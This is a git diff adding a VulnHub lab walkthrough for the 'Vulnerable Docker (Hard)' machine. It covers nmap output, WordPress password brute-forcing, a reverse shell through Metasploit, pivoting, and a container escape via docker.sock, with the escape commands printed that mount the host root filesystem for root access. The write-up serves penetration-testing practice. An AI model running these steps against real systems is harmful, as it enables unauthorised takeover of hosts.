diff --git a/VulnHub/Vulnerable_docker_Hard.md b/VulnHub/Vulnerable_docker_Hard.md
new file mode 100644
index 0000000..333f93f
--- /dev/null
+++ b/VulnHub/Vulnerable_docker_Hard.md
@@ -0,0 +1,140 @@
+# Vulnhub- Vulnerable Docker (Hard)
+
+## NMAP
+
+```
+nmap -p- -sC -sV 192.168.1.7
+
+Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 22:24 PKT
+Nmap scan report for 192.168.1.7
+Host is up (0.00013s latency).
+Not shown: 65533 closed ports
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)
+| 2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)
+| 256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)
+|_ 256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)
+8000/tcp open http Apache httpd 2.4.10 ((Debian))
+|_http-generator: WordPress 4.8.15
+|_http-open-proxy: Proxy might be redirecting requests
+| http-robots.txt: 1 disallowed entry
+|_/wp-admin/
+|_http-server-header: Apache/2.4.10 (Debian)
+|_http-title: NotSoEasy Docker – Just another WordPress site
+|_http-trane-info: Problem with XML parsing of /evox/about
+MAC Address: 08:00:27:D7:94:9E (Oracle VirtualBox virtual NIC)
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds
+
+```
+
+## PORT 8000 (HTTP)
+
+
+
+We can see this is a wordpress site so let's run `wpscan` on the site
+
+
+
+
+
+wpscan found a user name `bob` we can now try brute forcing the password
+
+
+
+
+
+Login with the credentials found
+
+
+
+
+
+Now we can either manually upload a php reverse shell or use metasploit exploit
+
+
+
+
+
+
+
+We didn't get a proper meterpreter shell because of web shell exploit we used so we need to generate linux payload , upload and execute on the target machine
+
+
+
+Open another meterpreter window and configure the listener
+
+
+
+
+
+
+
+Now commands can be run properly
+
+
+
+Use metasploit's `autoroute` to do pivoting
+
+
+
+Now we need to find what's running on docker conatiner so we can use metasploit's `auxiliary/scanner/portscan/tcp` module
+
+
+
+In order to access the ports we found we need to use proxychains for that we run `socks` module on metasploit and use proxyfroxy to configure proxy for browser
+
+
+
+Verify that the port is added in the `/etc/porxychains.conf`
+
+
+
+
+
+
+
+We can find `docker.sock` on the container which means we can create another container having host machien file system mounted on it
+
+
+
+
+
+But to upload a static binary on that container there is no utility to download a file but we do have internet avaiable on the machine so we can download `docker` as well but before that I downloaded `python3` on the container so I could get a stabilized shell
+
+Run `apt update` and then `apt install python3`
+
+
+
+
+
+
+Download static binary and transfer it to target machine
+
+
+
+
+
+
+
+Since we have `docker.sock` on our container we can list the imgaes being used
+
+`./docker -H unix:///var/run/docker.sock images`
+
+
+
+Now to mount the host file system on the container
+
+`./docker -H unix:///var/run/docker.sock run -it -v /:/host/ wordpress chroot /host`
+
+
+
+Add your generated ssh public key in `authorized_keys` and then ssh on the box as root
+
+
+
+
\ No newline at end of file